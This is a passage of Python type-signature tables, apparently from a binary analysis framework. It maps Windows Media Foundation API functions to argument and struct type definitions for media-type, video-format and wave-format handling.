'MFCreateMuxStreamMediaType': SimTypeFunction([SimTypeBottom(label="IMFCollection"), SimTypePointer(SimTypeBottom(label="IMFMediaType"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pMediaTypesToMux", "ppMuxMediaType"]),
#
'MFCreateMuxStreamSample': SimTypeFunction([SimTypeBottom(label="IMFCollection"), SimTypePointer(SimTypeBottom(label="IMFSample"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pSamplesToMux", "ppMuxSample"]),
#
'MFValidateMediaTypeSize': SimTypeFunction([SimTypeBottom(label="Guid"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["FormatType", "pBlock", "cbSize"]),
#
'MFCreateMediaType': SimTypeFunction([SimTypePointer(SimTypeBottom(label="IMFMediaType"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["ppMFType"]),
#
'MFCreateMFVideoFormatFromMFMediaType': SimTypeFunction([SimTypeBottom(label="IMFMediaType"), SimTypePointer(SimTypePointer(SimStruct({"dwSize": SimTypeInt(signed=False, label="UInt32"), "videoInfo": SimStruct({"dwWidth": SimTypeInt(signed=False, label="UInt32"), "dwHeight": SimTypeInt(signed=False, label="UInt32"), "PixelAspectRatio": SimStruct({"Numerator": SimTypeInt(signed=False, label="UInt32"), "Denominator": SimTypeInt(signed=False, label="UInt32")}, name="MFRatio", pack=False, align=None), "SourceChromaSubsampling": SimTypeInt(signed=False, label="MFVideoChromaSubsampling"), "InterlaceMode": SimTypeInt(signed=False, label="MFVideoInterlaceMode"), "TransferFunction": SimTypeInt(signed=False, label="MFVideoTransferFunction"), "ColorPrimaries": SimTypeInt(signed=False, label="MFVideoPrimaries"), "TransferMatrix": SimTypeInt(signed=False, label="MFVideoTransferMatrix"), "SourceLighting": SimTypeInt(signed=False, label="MFVideoLighting"), "FramesPerSecond": SimStruct({"Numerator": SimTypeInt(signed=False, label="UInt32"), "Denominator": SimTypeInt(signed=False, label="UInt32")}, name="MFRatio", pack=False, align=None), "NominalRange": SimTypeInt(signed=False, label="MFNominalRange"), "GeometricAperture": SimStruct({"OffsetX": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "OffsetY": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "Area": SimStruct({"cx": SimTypeInt(signed=True, label="Int32"), "cy": SimTypeInt(signed=True, label="Int32")}, name="SIZE", pack=False, align=None)}, name="MFVideoArea", pack=False, align=None), "MinimumDisplayAperture": SimStruct({"OffsetX": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "OffsetY": 
SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "Area": SimStruct({"cx": SimTypeInt(signed=True, label="Int32"), "cy": SimTypeInt(signed=True, label="Int32")}, name="SIZE", pack=False, align=None)}, name="MFVideoArea", pack=False, align=None), "PanScanAperture": SimStruct({"OffsetX": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "OffsetY": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "Area": SimStruct({"cx": SimTypeInt(signed=True, label="Int32"), "cy": SimTypeInt(signed=True, label="Int32")}, name="SIZE", pack=False, align=None)}, name="MFVideoArea", pack=False, align=None), "VideoFlags": SimTypeLongLong(signed=False, label="UInt64")}, name="MFVideoInfo", pack=False, align=None), "guidFormat": SimTypeBottom(label="Guid"), "compressedInfo": SimStruct({"AvgBitrate": SimTypeLongLong(signed=True, label="Int64"), "AvgBitErrorRate": SimTypeLongLong(signed=True, label="Int64"), "MaxKeyFrameSpacing": SimTypeInt(signed=False, label="UInt32")}, name="MFVideoCompressedInfo", pack=False, align=None), "surfaceInfo": SimStruct({"Format": SimTypeInt(signed=False, label="UInt32"), "PaletteEntries": SimTypeInt(signed=False, label="UInt32"), "Palette": SimTypePointer(SimUnion({"ARGB": SimStruct({"rgbBlue": SimTypeChar(label="Byte"), "rgbGreen": SimTypeChar(label="Byte"), "rgbRed": SimTypeChar(label="Byte"), "rgbAlpha": SimTypeChar(label="Byte")}, name="MFARGB", pack=False, align=None), "AYCbCr": SimStruct({"bCrValue": SimTypeChar(label="Byte"), "bCbValue": SimTypeChar(label="Byte"), "bYValue": SimTypeChar(label="Byte"), "bSampleAlpha8": SimTypeChar(label="Byte")}, name="MFAYUVSample", pack=False, align=None)}, name="<anon>", label="None"), offset=0)}, 
name="MFVideoSurfaceInfo", pack=False, align=None)}, name="MFVIDEOFORMAT", pack=False, align=None), offset=0), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pMFType", "ppMFVF", "pcbSize"]),
#
'MFCreateWaveFormatExFromMFMediaType': SimTypeFunction([SimTypeBottom(label="IMFMediaType"), SimTypePointer(SimTypePointer(SimStruct({"wFormatTag": SimTypeShort(signed=False, label="UInt16"), "nChannels": SimTypeShort(signed=False, label="UInt16"), "nSamplesPerSec": SimTypeInt(signed=False, label="UInt32"), "nAvgBytesPerSec": SimTypeInt(signed=False, label="UInt32"), "nBlockAlign": SimTypeShort(signed=False, label="UInt16"), "wBitsPerSample": SimTypeShort(signed=False, label="UInt16"), "cbSize": SimTypeShort(signed=False, label="UInt16")}, name="WAVEFORMATEX", pack=False, align=None), offset=0), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["pMFType", "ppWF", "pcbSize", "Flags"]),
#
'MFInitMediaTypeFromVideoInfoHeader': SimTypeFunction([SimTypeBottom(label="IMFMediaType"), SimTypePointer(SimStruct({"rcSource": SimStruct({"left": SimTypeInt(signed=True, label="Int32"), "top": SimTypeInt(signed=True, label="Int32"), "right": SimTypeInt(signed=True, label="Int32"), "bottom": SimTypeInt(signed=True, label="Int32")}, name="RECT", pack=False, align=None), "rcTarget": SimStruct({"left": SimTypeInt(signed=True, label="Int32"), "top": SimTypeInt(signed=True, label="Int32"), "right": SimTypeInt(signed=True, label="Int32"), "bottom": SimTypeInt(signed=True, label="Int32")}, name="RECT", pack=False, align=None), "dwBitRate": SimTypeInt(signed=False, label="UInt32"), "dwBitErrorRate": SimTypeInt(signed=False, label="UInt32"), "AvgTimePerFrame": SimTypeLongLong(signed=True, label="Int64"), "bmiHeader": SimTypeBottom(label="BITMAPINFOHEADER")}, name="VIDEOINFOHEADER", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Guid"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pMFType", "pVIH", "cbBufSize", "pSubtype"]),
#
'MFInitMediaTypeFromVideoInfoHeader2': SimTypeFunction([SimTypeBottom(label="IMFMediaType"), SimTypePointer(SimStruct({"rcSource": SimStruct({"left": SimTypeInt(signed=True, label="Int32"), "top": SimTypeInt(signed=True, label="Int32"), "right": SimTypeInt(signed=True, label="Int32"), "bottom": SimTypeInt(signed=True, label="Int32")}, name="RECT", pack=False, align=None), "rcTarget": SimStruct({"left": SimTypeInt(signed=True, label="Int32"), "top": SimTypeInt(signed=True, label="Int32"), "right": SimTypeInt(signed=True, label="Int32"), "bottom": SimTypeInt(signed=True, label="Int32")}, name="RECT", pack=False, align=None), "dwBitRate": SimTypeInt(signed=False, label="UInt32"), "dwBitErrorRate": SimTypeInt(signed=False, label="UInt32"), "AvgTimePerFrame": SimTypeLongLong(signed=True, label="Int64"), "dwInterlaceFlags": SimTypeInt(signed=False, label="UInt32"), "dwCopyProtectFlags": SimTypeInt(signed=False, label="UInt32"), "dwPictAspectRatioX": SimTypeInt(signed=False, label="UInt32"), "dwPictAspectRatioY": SimTypeInt(signed=False, label="UInt32"), "Anonymous": SimUnion({"dwControlFlags": SimTypeInt(signed=False, label="UInt32"), "dwReserved1": SimTypeInt(signed=False, label="UInt32")}, name="<anon>", label="None"), "dwReserved2": SimTypeInt(signed=False, label="UInt32"), "bmiHeader": SimTypeBottom(label="BITMAPINFOHEADER")}, name="VIDEOINFOHEADER2", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Guid"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pMFType", "pVIH2", "cbBufSize", "pSubtype"]),
#
'MFInitMediaTypeFromMPEG1VideoInfo': SimTypeFunction([SimTypeBottom(label="IMFMediaType"), SimTypePointer(SimStruct({"hdr": SimStruct({"rcSource": SimStruct({"left": SimTypeInt(signed=True, label="Int32"), "top": SimTypeInt(signed=True, label="Int32"), "right": SimTypeInt(signed=True, label="Int32"), "bottom": SimTypeInt(signed=True, label="Int32")}, name="RECT", pack=False, align=None), "rcTarget": SimStruct({"left": SimTypeInt(signed=True, label="Int32"), "top": SimTypeInt(signed=True, label="Int32"), "right": SimTypeInt(signed=True, label="Int32"), "bottom": SimTypeInt(signed=True, label="Int32")}, name="RECT", pack=False, align=None), "dwBitRate": SimTypeInt(signed=False, label="UInt32"), "dwBitErrorRate": SimTypeInt(signed=False, label="UInt32"), "AvgTimePerFrame": SimTypeLongLong(signed=True, label="Int64"), "bmiHeader": SimTypeBottom(label="BITMAPINFOHEADER")}, name="VIDEOINFOHEADER", pack=False, align=None), "dwStartTimeCode": SimTypeInt(signed=False, label="UInt32"), "cbSequenceHeader": SimTypeInt(signed=False, label="UInt32"), "bSequenceHeader": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="MPEG1VIDEOINFO", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Guid"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pMFType", "pMP1VI", "cbBufSize", "pSubtype"]),
#
'MFInitMediaTypeFromMPEG2VideoInfo': SimTypeFunction([SimTypeBottom(label="IMFMediaType"), SimTypePointer(SimStruct({"hdr": SimStruct({"rcSource": SimStruct({"left": SimTypeInt(signed=True, label="Int32"), "top": SimTypeInt(signed=True, label="Int32"), "right": SimTypeInt(signed=True, label="Int32"), "bottom": SimTypeInt(signed=True, label="Int32")}, name="RECT", pack=False, align=None), "rcTarget": SimStruct({"left": SimTypeInt(signed=True, label="Int32"), "top": SimTypeInt(signed=True, label="Int32"), "right": SimTypeInt(signed=True, label="Int32"), "bottom": SimTypeInt(signed=True, label="Int32")}, name="RECT", pack=False, align=None), "dwBitRate": SimTypeInt(signed=False, label="UInt32"), "dwBitErrorRate": SimTypeInt(signed=False, label="UInt32"), "AvgTimePerFrame": SimTypeLongLong(signed=True, label="Int64"), "dwInterlaceFlags": SimTypeInt(signed=False, label="UInt32"), "dwCopyProtectFlags": SimTypeInt(signed=False, label="UInt32"), "dwPictAspectRatioX": SimTypeInt(signed=False, label="UInt32"), "dwPictAspectRatioY": SimTypeInt(signed=False, label="UInt32"), "Anonymous": SimUnion({"dwControlFlags": SimTypeInt(signed=False, label="UInt32"), "dwReserved1": SimTypeInt(signed=False, label="UInt32")}, name="<anon>", label="None"), "dwReserved2": SimTypeInt(signed=False, label="UInt32"), "bmiHeader": SimTypeBottom(label="BITMAPINFOHEADER")}, name="VIDEOINFOHEADER2", pack=False, align=None), "dwStartTimeCode": SimTypeInt(signed=False, label="UInt32"), "cbSequenceHeader": SimTypeInt(signed=False, label="UInt32"), "dwProfile": SimTypeInt(signed=False, label="UInt32"), "dwLevel": SimTypeInt(signed=False, label="UInt32"), "dwFlags": SimTypeInt(signed=False, label="MPEG2VIDEOINFO_FLAGS"), "dwSequenceHeader": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="MPEG2VIDEOINFO", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Guid"), offset=0)], SimTypeInt(signed=True, label="Int32"), 
arg_names=["pMFType", "pMP2VI", "cbBufSize", "pSubtype"]),
# MFCalculateBitmapImageSize(pBMIH: BITMAPINFOHEADER*, cbBufSize: UInt32, pcbImageSize: UInt32*, pbKnown: Int32*) -> Int32
'MFCalculateBitmapImageSize': SimTypeFunction([SimTypePointer(SimStruct({"biSize": SimTypeInt(signed=False, label="UInt32"), "biWidth": SimTypeInt(signed=True, label="Int32"), "biHeight": SimTypeInt(signed=True, label="Int32"), "biPlanes": SimTypeShort(signed=False, label="UInt16"), "biBitCount": SimTypeShort(signed=False, label="UInt16"), "biCompression": SimTypeInt(signed=False, label="UInt32"), "biSizeImage": SimTypeInt(signed=False, label="UInt32"), "biXPelsPerMeter": SimTypeInt(signed=True, label="Int32"), "biYPelsPerMeter": SimTypeInt(signed=True, label="Int32"), "biClrUsed": SimTypeInt(signed=False, label="UInt32"), "biClrImportant": SimTypeInt(signed=False, label="UInt32")}, name="BITMAPINFOHEADER", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pBMIH", "cbBufSize", "pcbImageSize", "pbKnown"]),
# MFCalculateImageSize(guidSubtype: Guid*, unWidth: UInt32, unHeight: UInt32, pcbImageSize: UInt32*) -> Int32
'MFCalculateImageSize': SimTypeFunction([SimTypePointer(SimTypeBottom(label="Guid"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["guidSubtype", "unWidth", "unHeight", "pcbImageSize"]),
# MFFrameRateToAverageTimePerFrame(unNumerator: UInt32, unDenominator: UInt32, punAverageTimePerFrame: UInt64*) -> Int32
'MFFrameRateToAverageTimePerFrame': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeLongLong(signed=False, label="UInt64"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["unNumerator", "unDenominator", "punAverageTimePerFrame"]),
# MFAverageTimePerFrameToFrameRate(unAverageTimePerFrame: UInt64, punNumerator: UInt32*, punDenominator: UInt32*) -> Int32
'MFAverageTimePerFrameToFrameRate': SimTypeFunction([SimTypeLongLong(signed=False, label="UInt64"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["unAverageTimePerFrame", "punNumerator", "punDenominator"]),
# MFInitMediaTypeFromMFVideoFormat(pMFType: IMFMediaType, pMFVF: MFVIDEOFORMAT*, cbBufSize: UInt32) -> Int32
'MFInitMediaTypeFromMFVideoFormat': SimTypeFunction([SimTypeBottom(label="IMFMediaType"), SimTypePointer(SimStruct({"dwSize": SimTypeInt(signed=False, label="UInt32"), "videoInfo": SimStruct({"dwWidth": SimTypeInt(signed=False, label="UInt32"), "dwHeight": SimTypeInt(signed=False, label="UInt32"), "PixelAspectRatio": SimStruct({"Numerator": SimTypeInt(signed=False, label="UInt32"), "Denominator": SimTypeInt(signed=False, label="UInt32")}, name="MFRatio", pack=False, align=None), "SourceChromaSubsampling": SimTypeInt(signed=False, label="MFVideoChromaSubsampling"), "InterlaceMode": SimTypeInt(signed=False, label="MFVideoInterlaceMode"), "TransferFunction": SimTypeInt(signed=False, label="MFVideoTransferFunction"), "ColorPrimaries": SimTypeInt(signed=False, label="MFVideoPrimaries"), "TransferMatrix": SimTypeInt(signed=False, label="MFVideoTransferMatrix"), "SourceLighting": SimTypeInt(signed=False, label="MFVideoLighting"), "FramesPerSecond": SimStruct({"Numerator": SimTypeInt(signed=False, label="UInt32"), "Denominator": SimTypeInt(signed=False, label="UInt32")}, name="MFRatio", pack=False, align=None), "NominalRange": SimTypeInt(signed=False, label="MFNominalRange"), "GeometricAperture": SimStruct({"OffsetX": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "OffsetY": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "Area": SimStruct({"cx": SimTypeInt(signed=True, label="Int32"), "cy": SimTypeInt(signed=True, label="Int32")}, name="SIZE", pack=False, align=None)}, name="MFVideoArea", pack=False, align=None), "MinimumDisplayAperture": SimStruct({"OffsetX": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "OffsetY": SimStruct({"fract": 
SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "Area": SimStruct({"cx": SimTypeInt(signed=True, label="Int32"), "cy": SimTypeInt(signed=True, label="Int32")}, name="SIZE", pack=False, align=None)}, name="MFVideoArea", pack=False, align=None), "PanScanAperture": SimStruct({"OffsetX": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "OffsetY": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "Area": SimStruct({"cx": SimTypeInt(signed=True, label="Int32"), "cy": SimTypeInt(signed=True, label="Int32")}, name="SIZE", pack=False, align=None)}, name="MFVideoArea", pack=False, align=None), "VideoFlags": SimTypeLongLong(signed=False, label="UInt64")}, name="MFVideoInfo", pack=False, align=None), "guidFormat": SimTypeBottom(label="Guid"), "compressedInfo": SimStruct({"AvgBitrate": SimTypeLongLong(signed=True, label="Int64"), "AvgBitErrorRate": SimTypeLongLong(signed=True, label="Int64"), "MaxKeyFrameSpacing": SimTypeInt(signed=False, label="UInt32")}, name="MFVideoCompressedInfo", pack=False, align=None), "surfaceInfo": SimStruct({"Format": SimTypeInt(signed=False, label="UInt32"), "PaletteEntries": SimTypeInt(signed=False, label="UInt32"), "Palette": SimTypePointer(SimUnion({"ARGB": SimStruct({"rgbBlue": SimTypeChar(label="Byte"), "rgbGreen": SimTypeChar(label="Byte"), "rgbRed": SimTypeChar(label="Byte"), "rgbAlpha": SimTypeChar(label="Byte")}, name="MFARGB", pack=False, align=None), "AYCbCr": SimStruct({"bCrValue": SimTypeChar(label="Byte"), "bCbValue": SimTypeChar(label="Byte"), "bYValue": SimTypeChar(label="Byte"), "bSampleAlpha8": SimTypeChar(label="Byte")}, name="MFAYUVSample", pack=False, align=None)}, name="<anon>", label="None"), offset=0)}, 
name="MFVideoSurfaceInfo", pack=False, align=None)}, name="MFVIDEOFORMAT", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["pMFType", "pMFVF", "cbBufSize"]),
# MFInitMediaTypeFromWaveFormatEx(pMFType: IMFMediaType, pWaveFormat: WAVEFORMATEX*, cbBufSize: UInt32) -> Int32
'MFInitMediaTypeFromWaveFormatEx': SimTypeFunction([SimTypeBottom(label="IMFMediaType"), SimTypePointer(SimStruct({"wFormatTag": SimTypeShort(signed=False, label="UInt16"), "nChannels": SimTypeShort(signed=False, label="UInt16"), "nSamplesPerSec": SimTypeInt(signed=False, label="UInt32"), "nAvgBytesPerSec": SimTypeInt(signed=False, label="UInt32"), "nBlockAlign": SimTypeShort(signed=False, label="UInt16"), "wBitsPerSample": SimTypeShort(signed=False, label="UInt16"), "cbSize": SimTypeShort(signed=False, label="UInt16")}, name="WAVEFORMATEX", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["pMFType", "pWaveFormat", "cbBufSize"]),
# MFInitMediaTypeFromAMMediaType(pMFType: IMFMediaType, pAMType: AM_MEDIA_TYPE*) -> Int32
'MFInitMediaTypeFromAMMediaType': SimTypeFunction([SimTypeBottom(label="IMFMediaType"), SimTypePointer(SimStruct({"majortype": SimTypeBottom(label="Guid"), "subtype": SimTypeBottom(label="Guid"), "bFixedSizeSamples": SimTypeInt(signed=True, label="Int32"), "bTemporalCompression": SimTypeInt(signed=True, label="Int32"), "lSampleSize": SimTypeInt(signed=False, label="UInt32"), "formattype": SimTypeBottom(label="Guid"), "pUnk": SimTypeBottom(label="IUnknown"), "cbFormat": SimTypeInt(signed=False, label="UInt32"), "pbFormat": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="AM_MEDIA_TYPE", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pMFType", "pAMType"]),
# MFInitAMMediaTypeFromMFMediaType(pMFType: IMFMediaType, guidFormatBlockType: Guid, pAMType: AM_MEDIA_TYPE*) -> Int32
'MFInitAMMediaTypeFromMFMediaType': SimTypeFunction([SimTypeBottom(label="IMFMediaType"), SimTypeBottom(label="Guid"), SimTypePointer(SimStruct({"majortype": SimTypeBottom(label="Guid"), "subtype": SimTypeBottom(label="Guid"), "bFixedSizeSamples": SimTypeInt(signed=True, label="Int32"), "bTemporalCompression": SimTypeInt(signed=True, label="Int32"), "lSampleSize": SimTypeInt(signed=False, label="UInt32"), "formattype": SimTypeBottom(label="Guid"), "pUnk": SimTypeBottom(label="IUnknown"), "cbFormat": SimTypeInt(signed=False, label="UInt32"), "pbFormat": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="AM_MEDIA_TYPE", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pMFType", "guidFormatBlockType", "pAMType"]),
# MFCreateAMMediaTypeFromMFMediaType(pMFType: IMFMediaType, guidFormatBlockType: Guid, ppAMType: AM_MEDIA_TYPE**) -> Int32
'MFCreateAMMediaTypeFromMFMediaType': SimTypeFunction([SimTypeBottom(label="IMFMediaType"), SimTypeBottom(label="Guid"), SimTypePointer(SimTypePointer(SimStruct({"majortype": SimTypeBottom(label="Guid"), "subtype": SimTypeBottom(label="Guid"), "bFixedSizeSamples": SimTypeInt(signed=True, label="Int32"), "bTemporalCompression": SimTypeInt(signed=True, label="Int32"), "lSampleSize": SimTypeInt(signed=False, label="UInt32"), "formattype": SimTypeBottom(label="Guid"), "pUnk": SimTypeBottom(label="IUnknown"), "cbFormat": SimTypeInt(signed=False, label="UInt32"), "pbFormat": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="AM_MEDIA_TYPE", pack=False, align=None), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pMFType", "guidFormatBlockType", "ppAMType"]),
# MFCompareFullToPartialMediaType(pMFTypeFull: IMFMediaType, pMFTypePartial: IMFMediaType) -> Int32
'MFCompareFullToPartialMediaType': SimTypeFunction([SimTypeBottom(label="IMFMediaType"), SimTypeBottom(label="IMFMediaType")], SimTypeInt(signed=True, label="Int32"), arg_names=["pMFTypeFull", "pMFTypePartial"]),
# MFWrapMediaType(pOrig: IMFMediaType, MajorType: Guid*, SubType: Guid*, ppWrap: IMFMediaType*) -> Int32
'MFWrapMediaType': SimTypeFunction([SimTypeBottom(label="IMFMediaType"), SimTypePointer(SimTypeBottom(label="Guid"), offset=0), SimTypePointer(SimTypeBottom(label="Guid"), offset=0), SimTypePointer(SimTypeBottom(label="IMFMediaType"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pOrig", "MajorType", "SubType", "ppWrap"]),
# MFUnwrapMediaType(pWrap: IMFMediaType, ppOrig: IMFMediaType*) -> Int32
'MFUnwrapMediaType': SimTypeFunction([SimTypeBottom(label="IMFMediaType"), SimTypePointer(SimTypeBottom(label="IMFMediaType"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pWrap", "ppOrig"]),
# MFCreateVideoMediaType(pVideoFormat: MFVIDEOFORMAT*, ppIVideoMediaType: IMFVideoMediaType*) -> Int32
'MFCreateVideoMediaType': SimTypeFunction([SimTypePointer(SimStruct({"dwSize": SimTypeInt(signed=False, label="UInt32"), "videoInfo": SimStruct({"dwWidth": SimTypeInt(signed=False, label="UInt32"), "dwHeight": SimTypeInt(signed=False, label="UInt32"), "PixelAspectRatio": SimStruct({"Numerator": SimTypeInt(signed=False, label="UInt32"), "Denominator": SimTypeInt(signed=False, label="UInt32")}, name="MFRatio", pack=False, align=None), "SourceChromaSubsampling": SimTypeInt(signed=False, label="MFVideoChromaSubsampling"), "InterlaceMode": SimTypeInt(signed=False, label="MFVideoInterlaceMode"), "TransferFunction": SimTypeInt(signed=False, label="MFVideoTransferFunction"), "ColorPrimaries": SimTypeInt(signed=False, label="MFVideoPrimaries"), "TransferMatrix": SimTypeInt(signed=False, label="MFVideoTransferMatrix"), "SourceLighting": SimTypeInt(signed=False, label="MFVideoLighting"), "FramesPerSecond": SimStruct({"Numerator": SimTypeInt(signed=False, label="UInt32"), "Denominator": SimTypeInt(signed=False, label="UInt32")}, name="MFRatio", pack=False, align=None), "NominalRange": SimTypeInt(signed=False, label="MFNominalRange"), "GeometricAperture": SimStruct({"OffsetX": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "OffsetY": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "Area": SimStruct({"cx": SimTypeInt(signed=True, label="Int32"), "cy": SimTypeInt(signed=True, label="Int32")}, name="SIZE", pack=False, align=None)}, name="MFVideoArea", pack=False, align=None), "MinimumDisplayAperture": SimStruct({"OffsetX": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "OffsetY": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": 
SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "Area": SimStruct({"cx": SimTypeInt(signed=True, label="Int32"), "cy": SimTypeInt(signed=True, label="Int32")}, name="SIZE", pack=False, align=None)}, name="MFVideoArea", pack=False, align=None), "PanScanAperture": SimStruct({"OffsetX": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "OffsetY": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "Area": SimStruct({"cx": SimTypeInt(signed=True, label="Int32"), "cy": SimTypeInt(signed=True, label="Int32")}, name="SIZE", pack=False, align=None)}, name="MFVideoArea", pack=False, align=None), "VideoFlags": SimTypeLongLong(signed=False, label="UInt64")}, name="MFVideoInfo", pack=False, align=None), "guidFormat": SimTypeBottom(label="Guid"), "compressedInfo": SimStruct({"AvgBitrate": SimTypeLongLong(signed=True, label="Int64"), "AvgBitErrorRate": SimTypeLongLong(signed=True, label="Int64"), "MaxKeyFrameSpacing": SimTypeInt(signed=False, label="UInt32")}, name="MFVideoCompressedInfo", pack=False, align=None), "surfaceInfo": SimStruct({"Format": SimTypeInt(signed=False, label="UInt32"), "PaletteEntries": SimTypeInt(signed=False, label="UInt32"), "Palette": SimTypePointer(SimUnion({"ARGB": SimStruct({"rgbBlue": SimTypeChar(label="Byte"), "rgbGreen": SimTypeChar(label="Byte"), "rgbRed": SimTypeChar(label="Byte"), "rgbAlpha": SimTypeChar(label="Byte")}, name="MFARGB", pack=False, align=None), "AYCbCr": SimStruct({"bCrValue": SimTypeChar(label="Byte"), "bCbValue": SimTypeChar(label="Byte"), "bYValue": SimTypeChar(label="Byte"), "bSampleAlpha8": SimTypeChar(label="Byte")}, name="MFAYUVSample", pack=False, align=None)}, name="<anon>", label="None"), offset=0)}, name="MFVideoSurfaceInfo", pack=False, align=None)}, name="MFVIDEOFORMAT", 
pack=False, align=None), offset=0), SimTypePointer(SimTypeBottom(label="IMFVideoMediaType"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pVideoFormat", "ppIVideoMediaType"]),
# MFCreateVideoMediaTypeFromSubtype(pAMSubtype: Guid*, ppIVideoMediaType: IMFVideoMediaType*) -> Int32
'MFCreateVideoMediaTypeFromSubtype': SimTypeFunction([SimTypePointer(SimTypeBottom(label="Guid"), offset=0), SimTypePointer(SimTypeBottom(label="IMFVideoMediaType"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pAMSubtype", "ppIVideoMediaType"]),
# MFCreateVideoMediaTypeFromBitMapInfoHeader(pbmihBitMapInfoHeader: BITMAPINFOHEADER*, dwPixelAspectRatioX: UInt32, dwPixelAspectRatioY: UInt32, InterlaceMode: MFVideoInterlaceMode, VideoFlags: UInt64, qwFramesPerSecondNumerator: UInt64, qwFramesPerSecondDenominator: UInt64, dwMaxBitRate: UInt32, ppIVideoMediaType: IMFVideoMediaType*) -> Int32
